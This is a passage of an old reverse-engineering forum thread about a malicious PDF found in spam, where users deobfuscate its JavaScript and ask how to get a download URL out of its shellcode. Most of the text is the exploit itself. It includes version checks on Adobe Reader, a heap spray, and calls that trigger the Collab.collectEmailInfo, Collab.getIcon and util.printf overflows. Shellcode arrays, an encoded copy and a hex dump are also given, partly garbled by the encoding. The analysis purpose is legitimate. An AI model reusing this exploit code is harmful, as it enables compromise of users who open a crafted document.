Log in

View Full Version : PDF Exploit

int0
July 31st, 2009, 05:06
Decided to share some pdf exploit that I found yesterday in my spam over ICQ it might be interesting for those who reversing these PDF JS exploits.

Code:
var l21PZz0Q = new Array();

var haZ0Rmde;

function s8oOpYtLG(ve9sKDVuey, yNnpk1Ya6) {

    while (ve9sKDVuey.length * 2 < yNnpk1Ya6) {

        ve9sKDVuey += ve9sKDVuey;

    }

    ve9sKDVuey = ve9sKDVuey.substring(0, yNnpk1Ya6 / 2);

    return ve9sKDVuey;

}

function gdBvrtVkT(vGTSfY3ftC) {

    if (vGTSfY3ftC == 0) {

        var vOtVmM9Ws6 = 0x0c0c0c0c;

        var ruNE9AoC = new Array('%u5350%', 'u5251%u', '5756৅', '5%', 'u0000%u', '5d00໘', '3̐', 'd擀', '003x', '30‹', '0c', '0炋%', 'uad1c%u', '408b%', 'ueb08‹', '09̈́', '0䂍', 'b7c㱀', '坖', 'ebe%', 'u0100௾', 'eŎ%u', '0000%', 'uef01

', '6e8%u', '0001%', 'u5f00࢕', 'e自', '廂', '01R', '00', '068', '00࿰', '0井%u', '0001‰', '00自', '׬', '2%u', '3100%u', '01f6', 'ac2͙', 'cɣ', '%', 'ufb80%u', '7400%', 'u8806', '21cິ', '6౮', 'e㈄%u', '8900%u', '81ea%', 'u45c2', '002Ԡ', '0闿%u', '0152', '00%u', 'c281%u', '0250', '00ԅ', '2闿', '156', '0j', '06a', 'a89슁%', 'u015e', '', '襒', '自x', 'c2', '刀', '6a', 'ff', '6a%u', 'c281%', 'u015e%', 'u0000', 'f52֩', '5', '褀', '自%', 'u5ec2%u', '0001刀', '聨', '%u', 'ff00%', 'u4e95%', 'u0001࢐', '0自', '廂%', 'u0001%u', '3100', '6諂%u', '359c%', 'u026e', '%', 'ufb80݀', '0蠆%', 'u321c%', 'ueb46౮', 'e㈄%', 'u8900', '自%u', '45c2%', 'u0002%u', '5200闿', 'Œ', '', '0', '89', '281ɐ', '', '052%u', '95ffŖ', '', '0', 'a', '6a', 'న', '1', 'e', '襒%', 'u81ea

', '6c2%u', '0002刀', 'j%', 'ud0ff%u', '056a%u', 'ea89%', 'uc281', 'Ş%u', '0000%u', 'ff52֩', '5', '鴀%u', '5f5d֥', 'e[', '59썘%u', '0000', '00%', 'u0000', '%', 'u0000%', 'u0000', '', '0ٔ', '7呴%', 'u6d65', '偰', '461䅨', '䰀', '慯%', 'u4c64b', '69a', '72y', '72', '041ٔ', '7側%u', '6f72%u', '4163%', 'u6464e', '72ܷ', '3հ', '0湩%', 'u7845%', 'u6365', '00%u', 'f789%u', 'c030%', 'u75ae)', 'fd࢟', '7̟', '9뻀', '<%u', '0000%u', 'b503', '21b', '00굦', '蔃%u', '021b', '0炋', '378᳆%', 'ub503', '1b', '00௘', 'd', '1f', '00', '3adƸ', '5%u', 'ab00', '3adᮅ', '', '000궫', '蔃%', 'u021b', '00', 'eab�', '嚭', '503!', 'b', '욉%', 'ud789', 'c51੯', '3t', '59帄', '%u', '5ee9', '93', '3e0➅', '', '100–', 'f6૖', '6', '302ᾅ', '', '褀%', 'uadc6…', '03ț', '', 'c3%u', '0000', '0', '000', '00', '00%', 'u8900Ƹ', '5', '600', '857x', '?^', '5fƫ%u', '80ce%u', 'bb3eɴ', '', '嗃L', '52', 'f4d.', '4eӄ', '4L%', 'u5255%', 'u444cw', '6fۆ', 'e慯', '464F', '6f汩%u', '4165%', 'u7500ه', '0瑡', 'e65', '865', '65牣', '獡%u', '2e68h', '70p%u', '7468灴', '˳', 'a愯%u', '6f64ٖ', '2甭%u', '6470݆', '1湩%', 'u2d67%u', '6573%', 'u7672%u', '6369', 'e65%u', '6e63%', 'u6e2f', 'c75', 'f6cp', '75ؖ', '4整%u', '702e܆', '8椿', '㵤', '0%u', '9000');

    } else if (vGTSfY3ftC == 1) {

        vOtVmM9Ws6 = 0x30303030;

        var ruNE9AoC = new Array('卐', '251յ', '6鱕%u', '00e8', '00א', '0໘', '3ㄍ%u', '64c0', '003%u', '7830%u', '8b0c%u', '0c40p', '8b괜%u', '408b', '08謉%', 'u3440%', 'u408d%', 'u8b7c', '㱀W', '56庾%', 'u0001%u', '0100%', 'ubfee%u', '014e', '', 'e8', '01开', '襞%u', '81ea廂', '%u', '5200%u', '8068%u', '0000＀', 'ө', '5', '900自', '廂', '01㄀%', 'u01f6%', 'u8ac2', '㖜', '263', '00ﮀ%', 'u7400%u', '8806', '21c', 'b46%u', 'c6ee㈄', '褀%u', '81ea%', 'u45c2', '02刀%u', '95ff%', 'u0152', '%u', 'ea89', '81ɐ%', 'u0000P', '52闿%', 'u0156%', 'u0000', '06aj', '', '슁', '5e', '00࢕', '2自', '磂', '02刀%u', '006a%', 'ud0ff', 'ժ%u', 'ea89슁', 'Ş%', 'u0000', 'f52媕%', 'u0001%u', '8900ࠞ', 'a廂%u', '0001%u', '5200%u', '8068', '＀N', '95%u', '8900%u', '81ea׬', '2', '01㄀%u', '01f6%', 'u8ac2%', 'u359c%', 'u026e', '00ﮀ%', 'u7400ˆ', '06㈜', '', '౮', 'e㈄%', 'u8900%u', '81ea䗂', '', '2Ԡ', '0闿', 'Œ', '00', '89న', '1ɐ', '000P', '52闿%', 'u0156%', 'u0000', 'aj%', 'uea89%', 'uc281', '15e', '0襒', '1ea੬', '2', '刀', '6a', 'ffժ', '', '281', '15e%u', '0000', 'f52֩', '5', '鴀%u', '5f5d', 'a5e孙', '썘', '000%', 'u0000', '00', '0', '000%u', '0000%', 'u6547%', 'u5474', 'd65偰', '瑡%', 'u4168', 'c00', '16f䱤%', 'u6269', '172%u', '7972', '41敇%', 'u5074%u', '6f72䅣', '摤', '敲%', 'u7373', '700湩%', 'u7845', '365', '00', '89', '89쀰', '疮%u', '29fd觷', 'ㇹ', 'ec0', '3c', '딃', '21b', '000굦%', 'u8503%', 'u021b%', 'u0000܈', 'b荸%', 'u1cc6', '딃%u', '021b', '0', '8dȟ%u', '0000', '3adƸ', '5', '02ર', '0έ%', 'u1b85%u', '0002倀', '궫%', 'u8503!', 'b', '00ת', 'b�%', 'u56ad', '503ț%', 'u0000', '욉

', '789ﱑ%', 'ua6f3', '459^', '04', '43', 'ee9%u', 'd193%u', '03e0%u', '2785', '2㄀%', 'u96f6૖', '6', 'c1', '302ᾅ', '%', 'u8900૜', '6蔃', 'ț', '000', '', '0', '00', '', '0', '', '000%u', '0000', '900Ƹ', '5', '2嘀', '', '58?', '幟', 'ƫ', '胎', '3eɴ%', 'uedebU', 'c3䱒%u', '4f4d%', 'u2e4e', '䱄', '04c剕%', 'u444cw', '6f', 'c6e慯%', 'u5464F', '6f汩%u', '4165ݐ', '0摰', '461⹥%', 'u7865', '5牣', 'ܶ', '1⹨%u', '6870', '070', '468灴', '˳', 'a愯', 'f64ٖ', '2ݒ', 'd摰%u', '7461%u', '6e69', 'd67敳%', 'u7672ض', '9⹥%u', '6e63%', 'u6e2fۇ', '5⽬', '܇', '5慤', '574瀮%', 'u7068%', 'u693fϖ', '41    ', '000');

    } else if (vGTSfY3ftC == 2) {

        var ruNE9AoC = new Array('卐%u', '5251坖', '鱕%', 'u00e8', '0]', '00໘', '3ㄍ%u', '64c0', '003砰%', 'u8b0c%', 'u0c40܈', 'b૑', 'c䂋%u', 'eb08ࢰ', '9̈́', '0䂍%', 'u8b7c', '㱀W', '56庾%u', '0001Ā', '뿮%', 'u014e', '0', '훨%', 'u0001װ', '0襞%', 'u81ea%u', '5ec2', '01刀', '聨%', 'u0000', '00井%', 'u0001%', 'u8900%', 'u81ea', '׬', '2', '100', '1f6諂%', 'u359c', 'ɣ', '000', '80݀', '0ˆ', '06̡', 'c', '46웮%u', '3204', '900', '1ea䗂%', 'u0002', '200•', 'ffŒ%', 'u0000%u', 'ea89', '81', '50', '00偒', '闿', '56%', 'u006a', '06a', '89', '81Ş', '', '952自%', 'u78c2%u', '0002Ԡ', '0j%u', 'd0ff', '6a', 'a89%u', 'c281', '5e%u', 'ff52媕', '%', 'u8900ࠞ', 'a廂%', 'u0001', '200ࠆ', '8', '0࿰', '0井', '001', '900自%', 'u5ec2%u', '00011', '00Ƕ', '諂%u', '359c&', 'e', '0', '80琀', '蠆', '21c', '웮2', '04‰', '00', '1ea䗂', '', '200•', 'ff', '152%', 'uea89', '281', '250%', 'u5052%', 'u95ff', '6', 'j%u', '006a', 'న', '1', '5e', '000', '952', 'ea

', '6c2', '刀%', 'u006a%', 'ud0ff', '56a', '89슁', 'Ş', '00࿵', '2֩', '5', '01鴀%', 'u5f5d', 'a5e[', '59', '358', '000%', 'u0000', '', '000', '00%', 'u0000%', 'u6547%u', '5474浥', '偰%u', '7461䅨', '䰀', '慯L', '64扩%', 'u6172%', 'u7972%u', '0041%', 'u6547', '側%', 'u6f72', '䅣', '摤%u', '6572', '373հ', '0n', '69', '845c', '65', '00%', 'uf789', '30u', 'ae', '9fd觷%', 'u31f9%u', 'bec0', '3c', '0딃%', 'u021b', '*', '66ࡐ', '3!', 'b%u', '708bƒ', '78nj', '6୐', '3ț', '', 'd8d', '1f%u', '03adᮅ', '%', 'uab00', 'adᮅ', '%', 'u5000*', 'ab蔃', 'ț%u', '0000^', 'ab�%', 'u56ad%u', '8503%u', '021b', '0욉%', 'ud789', '࿅', '1꛳%u', '7459%u', '5e04%', 'ueb43', '廩%', 'ud193>', '0➅', '', '2㄀%u', '96f6૖', '6', '̂', '85%u', '8900*', 'c6…', '03', '1b', '', '10', '00', '00', '000', '00', '%u', '0000%', 'u8900', 'b85', '02', '600', '࿵', '8?', 'e5f', 'b胎', 'b3e', '74', '՜', '3䱒%', 'u4f4d%', 'u2e4e', 'ӄ', '4L%', 'u5255%', 'u444c%u', '776f汮', '慯', '呤F', '6f', 'c69䅥%', 'u7500%', 'u6470t', '61⹥%', 'u7865%u', '0065ܦ', '3獡%', 'u2e68%', 'u6870', '70݆', '8灴%u', '2f3a%u', '612f%u', '6f64e', '62', '52dه', '0瑡', '湩-', '67敳%u', '7672ض', '9⹥', '湣%u', '6e2f%', 'u6c75˶', 'c灵%', 'u6164%u', '6574%', 'u702e', '灨', '椿%u', '3d64', '32退');

    }

    ruNE9AoC = unescape(ruNE9AoC.join("");

    var eAgmifDht = 0x400000;

    var dHnF7FRmG = ruNE9AoC.length * 2;

    var yNnpk1Ya6 = eAgmifDht - (dHnF7FRmG + 0x38);

    var ve9sKDVuey = unescape("邐邐";

    ve9sKDVuey = s8oOpYtLG(ve9sKDVuey, yNnpk1Ya6);

    var n3zhysk5Q = (vOtVmM9Ws6 - 0x400000) / eAgmifDht;

    for (var l3OI3a6WPr = 0; l3OI3a6WPr < n3zhysk5Q; l3OI3a6WPr++) {

        l21PZz0Q[l3OI3a6WPr] = ve9sKDVuey + ruNE9AoC;

    }

}

function u3YLEtn9() {

    var dNCo7puf = 0;

    var pzZx1DcVW = app.viewerVersion.toString();

    app.clearTimeOut(haZ0Rmde);

    if ((pzZx1DcVW >= 8 && pzZx1DcVW < 8.102) || pzZx1DcVW < 7.1) {

        gdBvrtVkT(0);

        var dVRPCBXpLP = unescape("ఌఌ";

        while (dVRPCBXpLP.length < 44952) dVRPCBXpLP += dVRPCBXpLP;

        var nB9GCOSZ = this;

        var hOtfng08 = Collab;

        nB9GCOSZ["collabStore"] = hOtfng08["collectEmailInfo"]({

            subj: "",

            msg: dVRPCBXpLP

        });

    }

    if ((pzZx1DcVW >= 8.102 && pzZx1DcVW < 8.104) || (pzZx1DcVW >= 9 && pzZx1DcVW < 9.1) || pzZx1DcVW <= 7.101) {

        try {

            if (app.doc.Collab.getIcon) {

                gdBvrtVkT(2);

                var eYHmb5j5U = unescape("%09";

                while (eYHmb5j5U.length < 0x4000) {

                    eYHmb5j5U += eYHmb5j5U;

                }

                eYHmb5j5U = "N." + eYHmb5j5U;

                var bqVh0ejwx = app;

                bqVh0ejwx["doc"]["Collab"]["getIcon"](eYHmb5j5U);

                dNCo7puf = 1;

            } else {

                dNCo7puf = 1;

            }

        } catch(e) {

            dNCo7puf = 1;

        }

        if (dNCo7puf == 1) {

            if (pzZx1DcVW == 8.102 || pzZx1DcVW == 7.1) {

                gdBvrtVkT(1);

                var qc1ncdvp = "12999999999999999999";

                for (vPTruT1d = 0; vPTruT1d < 276; vPTruT1d++) {

                    qc1ncdvp += "8";

                }

                var m4t4q0zGO = util;

                m4t4q0zGO["printf"]("%45000f", qc1ncdvp);

            }

        }

    }

}

app.m2B1rLly = u3YLEtn9;

haZ0Rmde = app.setTimeOut("app.m2B1rLly()", 10);



These are Adobe Reader version checks


Code:


var pzZx1DcVW = app.viewerVersion.toString();

...

if ((pzZx1DcVW >= 8.102 && pzZx1DcVW < 8.104) || (pzZx1DcVW >= 9 && pzZx1DcVW < 9.1) || pzZx1DcVW <= 7.101)

 

if ((pzZx1DcVW >= 8 && pzZx1DcVW < 8.102) || pzZx1DcVW < 7.1)

 

if (pzZx1DcVW == 8.102 || pzZx1DcVW == 7.1)


var ruNE9AoC its an array which holds shellcode with url.

PW for attachment "infected"
h4h4h4h4
August 6th, 2009, 13:21
Quote:
[Originally Posted by int0;82170]Decided to share some pdf exploit that I found yesterday in my spam over ICQ it might be interesting for those who reversing these PDF JS exploits.
...

var ruNE9AoC its an array which holds shellcode with url.


First off, thanks for sharing! Im new here, but ive been 'trolling' around for awhile

So i checked out the PDF, noticed no obfuscated JS inside of it. Now to check the FLateDecode streams. I used the inflater.exe tool from didler stevens and decoded all the streams. I got this

Code:




var arr = new Array('%76%61%','72%20%','6c%32%3','1%50%','5a%7a%','30%51%20%3','d%20%6','e%65%77%','20%41%72','%72 %61%','79%28%29','%3b%76%61%','72%20%68%6','1%5a%3','0%52%6d%','64%65%','3b%66','%75%6e%63','%74%69' ,'%6f%6e%2','0%73%38%6f','%4f%70%5','9%74%4c%47','%28%76%6','5%39%73','%4b%44%56%','75%65%','79%2c', '%20%79','%4e%6e%7','0%6b%31%59','%61%36%','29%7b%7','7%68%69%6','c%65%28','%76%65%39','%73%4b%4','4 %56%7','5%65%79','%2e%6c%','65%6e%67%7','4%68%2','0%2a%20','%32%20%3','c%20%79%4','e%6e%7','0%6b%',' 31%59%61','%36%29%','7b%76%65%','39%73','%4b%44','%56%75%','65%79%','20%2b%3d%','20%76%6','5%39%73%4 b','%44%5','6%75%65%79','%3b%7d%7','6%65%39','%73%4','b%44%','56%75%65%','79%20%3d%2','0%76%6','5%39 %73%4b','%44%56%','75%65%','79%2e%7','3%75%62%73','%74%72','%69%6e%','67%28%30%2','c%20%79%4','e%6e% 7','0%6b%','31%59','%61%36%20%','2f%20%32%','29%3b','%72%65%7','4%75%7','2%6e%20%76','%65%39','%73%4 b%44%','56%75%65%7','9%3b%','7d%66%75','%6e%63','%74%69%6f%','6e%20%','67%64%42%','76%72%7','4%56%6b %','54%28%76%','47%54%53%','66%59%33','%66%74%43','%29%7b%69%','66%28%7','6%47%54%','53%66%59%','33% 66%74%','43%20%3','d%3d%20','%30%29%7','b%76%61%','72%20%76','%4f%74%56%','6d%4d%','39%57%73%','36%2 0','%3d%20%','30%78%30%','63%30%','63%30%6','3%30%63','%3b%76%6','1%72%20%','72%75%4e%','45%39%','41 %6f%4','3%20%3d%','20%6e%65','%77%20%41','%72%72%6','1%79%28%2','7%25%','75%35%33%3','5%30%','25%27% ','2c%27%75%','35%32%35','%31%2','5%75%2','7%2c%27%3','5%37%35%36','%25%75%3','9%63%35%27','%2c%27%3 ','5%25%75%','30%30%65%3','8%25%27%2','c%27%75%','30%30','%30%30%25','%75%27%2','c%27%','35%64%30%', '30%25%75','%65%64%38%','27%2c%','27%33','%25%7','5%33%31%30','%27%2c%27','%64%25%75','%36%34%63%',' 30%25%75%','34%27%2c%','27%30%30%3','3%25%75%3','7%38%27','%2c%27%3','3%30%25','%75%38%62','%27%2c%2 ','7%30%63','%25%75','%30%6','3%34%2','7%2c%','27%30%','25%75%37%3','0%38%62%','25%27%2','c%27%75%', '61%64','%31%63%25','%75%2','7%2c%','27%34%30%3','8%62%2','5%27%2','c%27%75%65','%62%30','%38%25%75% ','38%62%2','7%2c%27%3','0%39%25%','75%33%3','4%34%27%2','c%27%30%25','%75%34%30','%38%64%2','5%75%3 8%2','7%2c%','27%62%37%','63%25%75%3','3%63%34%','30%27%2','c%27%25%75','%35%37','%35%36%25','%75%35 %2','7%2c%2','7%65%6','2%65%25%','75%30%30%3','0%31%25%2','7%2c%27%75','%30%31%','30%30%','25%75%62' ,'%66%65%','27%2c%2','7%65%25%','75%30%31%','34%65','%25%75','%27%2c%2','7%30%30%3','0%30%','25%27', '%2c%27%75','%65%6','6%30%31%','25%75%','64%27%2c','%27%36','%65%38%25%','75%27','%2c%27%','30%30',' %30%31','%25%27%2c%','27%75%35%6','6%30%30%25','%75%38%39%','35%27','%2c%27','%65%25%75','%38%31%65' ,'%61%2','7%2c%2','7%25%75%3','5%65%63','%32%2','5%75%','30%30%27%','2c%27%30%3','1%25%75%','35%32%2 ','7%2c%','27%30%30','%25%75%38','%27%2c%','27%30%36%','38%25%7','5%30%3','0%27%','2c%27','%30%30%25 %','75%66%66%3','0%27%2c','%27%30%2','5%75%','34%65%3','9%35%','25%75','%27%2c','%27%3','0%30%30','% 31%2','5%75%38%','39%27%','2c%27','%30%3','0%25%75','%38%31','%65%61%','27%2c%27%2','5%75%35%6','5%6 3%27','%2c%27%32%','25%75%30%3','0%30%31%25','%75%27%2c%','27%33','%31%30%30%','25%75%','27%2c%2','7 %30%31','%66%3','6%25%75%3','8%27%','2c%27%','61%63%32','%25%75%33','%35%39%','27%2c','%27%63%2','5% 75%30%','32%36%3','3%27%2c','%27%25%75%','30%30%','30%30%25%','27%2c%27%7','5%66%','62%38%','30%25%7 5','%27%2c%2','7%37%34%','30%30%2','5%27%2c','%27%75%','38%38','%30%36','%25%75%','33%27%2c','%27%32 %','31%63%25%','75%65','%62%34%2','7%2c%27%3','6%25%75%','63%36%65','%27%2c%27%','65%25%75%3','3%32% 30','%34%25%7','5%27%','2c%27%3','8%39%30%3','0%25%','75%27%2','c%27%','38%31%65%','61%25%27','%2c%2 7%7','5%34%3','5%63%32%25','%75%30%','27%2c%27%','30%30%32','%25%75%35%','32%30%27%2','c%27%30%2','5 %75%39%3','5%66%66','%25%75','%27%2c%27%','30%31%','35%32%','25%75%','30%30%27%','2c%27%30','%30%2', '5%75%65%','61%38%3','9%25%75%','27%2c%27%','63%32%','38%31%25%','75%27%2c%','27%30%32%3','5%30%','2 5%75','%30%30%27','%2c%27','%30%30%25','%75%3','5%30%35%2','7%2c%27','%32%25%','75%39%35%','66%66',' %25%75','%30%27%2c','%27%3','1%35%36%','25%75%3','0%30%30%','27%2c','%27%30%','25%75%30','%30%36%6', '1%25%75%','30%27%2c%2','7%30%36%','61%25%75%6','5%27%2c%27','%61%38%39','%25%7','5%63%3','2%38%31', '%25%27%','2c%27%75%','30%31%35','%65%27%2c','%27%25%7','5%30%30%','30%30%2','7%2c%27','%25%75%38',' %39%35%32','%27%2','c%27%25%','75%38%31%','65%61%25','%75%37%38%','27%2c','%27%63%32%','25%75%','30% 30','%30%32','%27%2','c%27%25%75','%35%32%','30%30%2','5%75%30%','30%27%2c%2','7%36%61%2','5%75%','6 4%30%','27%2c%2','7%66%66%','25%75','%30%35%','27%2c%27','%36%61%','25%75%','65%61%38%3','9%25%75%2' ,'7%2c%27','%63%32%38','%31%2','5%27%','2c%27%75%3','0%31%35','%65%25%27%','2c%27%75%','30%30%3','0% 30%','25%75%66','%27%2','c%27%','66%35','%32%2','5%75%','35%61%39','%27%2','c%27%35%','25%75%','30%3 0%30%','31%27%2','c%27%','25%75%3','8%39%30','%30%27%','2c%27%25%','75%38%','31%65%61','%25%27%2c',' %27%75%3','5%65%63%3','2%25%75%2','7%2c%27%30','%30%30%31%','25%75%','35%32%','30%30','%27%2c%','27% 25%75%','38%30%3','6%38%','27%2c%27%','25%75%30','%30%30%3','0%25%','75%27%2','c%27%66%66','%30%3',' 0%25%27%2','c%27%75%34','%65%39','%35%25','%27%2c%','27%75%','30%30%3','0%31%25%','75%38%39%','30%27 %2','c%27%30%25','%75%3','8%31%','65%61%27','%2c%27%25','%75%35%','65%63%32%2','5%27%2c%27','%75%30' ,'%30%30%31%','25%75%27','%2c%27%','33%31%30','%30%25%75','%30%31%66','%27%2','c%27%','36%25%','75%3 8%61%','63%32','%25%75%27%','2c%27','%33%35','%39%63%25','%27%2c','%27%7','5%30%32','%36%65%27','%2c %27','%25%7','5%30%30%30','%30%25%2','7%2c%27','%75%6','6%62%','38%30','%25%75%3','7%34%30%','27%2c% 27%','30%25%7','5%38%3','8%30%36%25','%27%2c%27%','75%33%32','%31%63%','25%27%2','c%27%75','%65%62%3 4%','36%25%75','%63%36%','65%27%','2c%27%','65%25%75','%33%32','%30%34%2','5%27%2c%27','%75%3','8%39 %3','0%30%','27%2c%27%','25%75%38%3','1%65%61%25','%75%27%2c%','27%34','%35%63%3','2%25%2','7%2c%2', '7%75%30%30','%30%32','%25%7','5%27%2c%','27%35%','32%30%30%2','5%75%3','9%35%','66%66%','27%2c','%2 7%25%7','5%30%31%3','5%32%','27%2c%27%','25%75%30%3','0%30%27%2','c%27%30%2','5%75%6','5%61%27%2c',' %27%38%39','%25%75%','63%27%2c%','27%32%38%3','1%25%75%30','%32%3','5%30%27%','2c%27%','25%75%30%3', '0%30%','30%25%75%3','5%27%','2c%27','%30%3','5%32%25%7','5%27%2c%27','%39%3','5%66%66%','25%75%30', '%31%3','5%36%2','7%2c%2','7%25%75%','30%30%30%2','7%2c%2','7%30%25%7','5%30%30%36','%27%2c%27','%61 %2','5%75%30%','30%27%2c%','27%36','%61%25%75','%65%61%','38%39%2','7%2c%27%25','%75%63%','32%38%27% ','2c%27','%31%25%75','%30%31%35','%27%2c','%27%65%25%','75%30','%30%30%30%','27%2c%27','%25%7','5%3 8%3','9%35%32%','25%27','%2c%27','%75%38','%31%65','%61%25%75','%61%27%2c%','27%36%63%','32%25%7','5 %27%2c%','27%30%30%3','0%32%25%75','%35%32%','30%30%27%2','c%27%','25%75%3','0%30%36%6','1%25%27%',' 2c%27%75%6','4%30%6','6%66%25%75','%27%2c%27%','30%35%3','6%61%25%75','%27%2c%','27%65%61%3','8%39%2 5%27','%2c%27%7','5%63%32%','38%31%2','7%2c%27','%25%75%30','%31%3','5%65%','25%75%27','%2c%27%30',' %30%3','0%30%25','%75%27','%2c%27%66%','66%35%32','%25%75%35%','61%39%27%','2c%27%35','%25%75%','30% 30%3','0%31%2','7%2c%2','7%25%75%','39%64%','30%30%','25%75%27%2','c%27%','35%66%3','5%64%25%','75%3 5%','61%35%27%2','c%27%65%25','%75%35%62','%27%2c','%27%3','5%39%25%7','5%63%33%','35%38%25%','75%27 %','2c%27%3','0%30%30%30','%25%75%3','0%30%27%2c','%27%30%3','0%25%75','%30%30%3','0%30%25%','27%2c% 27','%75%30%3','0%30%30%','27%2c%2','7%25%75','%30%30%','30%30%2','5%27%2','c%27%75','%30%30%','30%3 0%25%2','7%2c%27','%75%30','%30%30%3','0%27%2c%27','%25%75%','30%30%','30%27%2','c%27%30','%25%75%', '36%35%3','4%27%2c%2','7%37%','25%75%3','5%34%','37%34','%25%27%2c%','27%75%36','%64%3','6%35%27','% 2c%27%2','5%75%35','%30%37%30','%25%75','%37%27%2c%','27%34%','36%31%25%','75%34%3','1%36%38%27','%2 c%27%25%','75%34%63%','30%30%27','%2c%27%','25%75%3','6%31%36','%66%25%2','7%2c%','27%75%34','%63%3' ,'6%34%25%75','%36%3','2%27%2c%2','7%36%39%','25%75%36','%31%27%2c%','27%37%3','2%25%7','5%37%','39% 27%2c','%27%3','7%32%','25%75%','30%27%2c%','27%30','%34%3','1%25%75%3','6%35%34%2','7%2c%27%37','%2 5%75%3','5%30%3','7%34%25%75','%27%2c','%27%36

var alert = eval;

alert(string);


Cool, some obs JS. First thing i noticed tho, at the end of the new Array, it doesnt have a closing tick ' and bracket ). So i added that and tried to run it in malzilla, but the eval is for 'string' not 'arr'. So i manually deobfuscated it by replacing ',' and then i got a clean section of hex url encoding. Convered all the %hex and got this:


Code:
var l21PZz0Q = new Array();



var haZ0Rmde;



function s8oOpYtLG(ve9sKDVuey, yNnpk1Ya6)

{

while(ve9sKDVuey.length * 2 < yNnpk1Ya6)

{

ve9sKDVuey += ve9sKDVuey;

}

ve9sKDVuey = ve9sKDVuey.substring(0, yNnpk1Ya6 / 2);

return ve9sKDVuey;

}

function gdBvrtVkT(vGTSfY3ftC)

{

if(vGTSfY3ftC == 0)

{

var vOtVmM9Ws6 = 0x0c0c0c0c;



var ruNE9AoC = new Array('%u5350%','u5251%u','5756%u9c5','5%u00e8%','u0000%u','5d00%ued8','3%u310','d%u64c0%u4','003%u7 8','30%u8b','0c%u0c4','0%u708b%','uad1c%u','408b%','ueb08%u8b','09%u344','0%u408d%u8','b7c%u3c40','% u5756%u5','ebe%u0001%','u0100%ubfe','e%u014e%u','0000%','uef01%ud','6e8%u','0001%','u5f00%u895','e%u 81ea','%u5ec2%u00','01%u52','00%u8','068%u00','00%uff0','0%u4e95%u','0001%u89','00%u81ea','%u5ec','2 %u0001%u','3100%u','01f6%u8','ac2%u359','c%u0263','%u0000%','ufb80%u','7400%','u8806%u3','21c%ueb4', '6%uc6e','e%u3204%u','8900%u','81ea%','u45c2%u0','002%u520','0%u95ff%u','0152%u00','00%uea89%u','c28 1%u','0250%u00','00%u505','2%u95ff%u0','156%u000','0%u006a%u0','06a%ue','a89%uc281%','u015e','%u0000 ','%u8952','%u81ea%u78','c2%u0002','%u5200%u00','6a%ud0','ff%u05','6a%uea89%u','c281%','u015e%','u00 00%uf','f52%u5a9','5%u0001','%u8900','%u81ea%','u5ec2%u','0001%u5200','%u8068','%u0000%u','ff00%','u 4e95%','u0001%u890','0%u81ea','%u5ec2%','u0001%u','3100%u01f','6%u8ac2%u','359c%','u026e','%u0000%', 'ufb80%u740','0%u8806%','u321c%','ueb46%uc6e','e%u3204%','u8900','%u81ea%u','45c2%','u0002%u','5200% u95ff','%u0152','%u000','0%uea','89%uc','281%u0250','%u0000%u5','052%u','95ff%u0156','%u000','0%u006 ','a%u00','6a%uea89','%uc28','1%u015','e%u0000','%u8952%','u81ea%ua','6c2%u','0002%u5200','%u006a%', 'ud0ff%u','056a%u','ea89%','uc281','%u015e%u','0000%u','ff52%u5a9','5%u0001','%u9d00%u','5f5d%u5a5', 'e%u5b','59%uc358%u','0000%u00','00%u0000%','u0000','%u0000%','u0000%','u0000','%u000','0%u654','7%u 5474%','u6d65','%u5070%u7','461%u4168','%u4c00','%u616f%','u4c64%u62','69%u61','72%u79','72%u0','041 %u654','7%u5074%u','6');


So it looks like the exploit and rUNE9AoC is the shellcode.

Replaced ',' in the shellcode and in malzilla do usc2 to hex. Then pasted the hex in hex view and was expecting to find the URL.

Instead, i just see some weird unicode characters, then at the bottom a "GetTempPathA.LoadLibraryA.Getp" then thats the end of it.

I tried to search for an XOR key by string http and it found nothing. How did you get the download URL from the shellcode?

Thanks!
5aLIVE
August 8th, 2009, 07:42
Quote:
[Originally Posted by h4h4h4h4;82270] I used the inflater.exe tool from didler stevens and decoded all the streams.


Hi,
Can you provide a link to this tool please? The only PDF tools I could find on Didier Stevens sitet are PDF-Parser and PDFID.

I am also aware of the PDF Streams Inflater by Boban Spasic (aka bobby).

Thanks,
5aLIVE.
h4h4h4h4
August 10th, 2009, 10:35
Im sorry i mixed up my tool Authors. The pdf stream inflator tool i used is indeed by Bobby. I was thinking of the PDFID tool by Didier Stevens at the same time.

Can anyone help me find out how the url is obtained from the shellcode?

I searched for any XOR keys and cant find any. Normally When i dont see a URL from a PDF/Flash exploit, and i search XOR for string 'http' Malzilla finds the key and then the URL appears.

Code:


 

%u5350剑坖鱕崀ㄍ擀䀃砰謌ీ炋괜䂋謉㑀䂍譼㱀坖庾Ā뿮Ŏ훨开襞自廂刀聨＀井褀自廂㄀Ƕ諂㖜ɣﮀ琀蠆㈜웮㈄褀自䗂刀闿Œ슁ɐ偒闿Ŗjj슁Ş襒自磂刀j탿ժ슁Şr媕褀自廂刀聨 ＀井褀自廂㄀Ƕ諂㖜ɮﮀ琀蠆㈜웮㈄褀自䗂刀闿Œ슁ɐ偒闿Ŗjj슁Ş襒自ꛂ刀j탿ժ슁Şr媕鴀彝婞孙썘敇呴浥偰瑡䅨䰀慯䱤扩慲祲A敇側
int0
August 12th, 2009, 03:24
Code:
Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F



00000000   53 50 52 51 57 56 9C 55  00 E8 00 00 5D 00 ED 83   SPRQWVU...].

00000010   31 0D 64 C0 40 03 78 30  8B 0C 0C 40 70 8B AD 1C   1.d@.x0..@p*.

00000020   40 8B EB 08 8B 09 34 40  40 8D 8B 7C 3C 40 57 56   @..4@@|<@WV

00000030   5E BE 00 01 01 00 BF EE  01 4E 00 00 EF 01 D6 E8   ^.....N...

00000040   00 01 5F 00 89 5E 81 EA  5E C2 00 01 52 00 80 68   .._.^^..R.h

00000050   00 00 FF 00 4E 95 00 01  89 00 81 EA 5E C2 00 01   ...N...^..

00000060   31 00 01 F6 8A C2 35 9C  02 63 00 00 FB 80 74 00   1..5.c..t.

00000070   88 06 32 1C EB 46 C6 EE  32 04 89 00 81 EA 45 C2   .2.F2..E

00000080   00 02 52 00 95 FF 01 52  00 00 EA 89 C2 81 02 50   ..R..R...P

00000090   00 00 50 52 95 FF 01 56  00 00 00 6A 00 6A EA 89   ..PR.V...j.j

000000A0   C2 81 01 5E 00 00 89 52  81 EA 78 C2 00 02 52 00   .^..Rx..R.

000000B0   00 6A D0 FF 05 6A EA 89  C2 81 01 5E 00 00 FF 52   .j.j.^..R

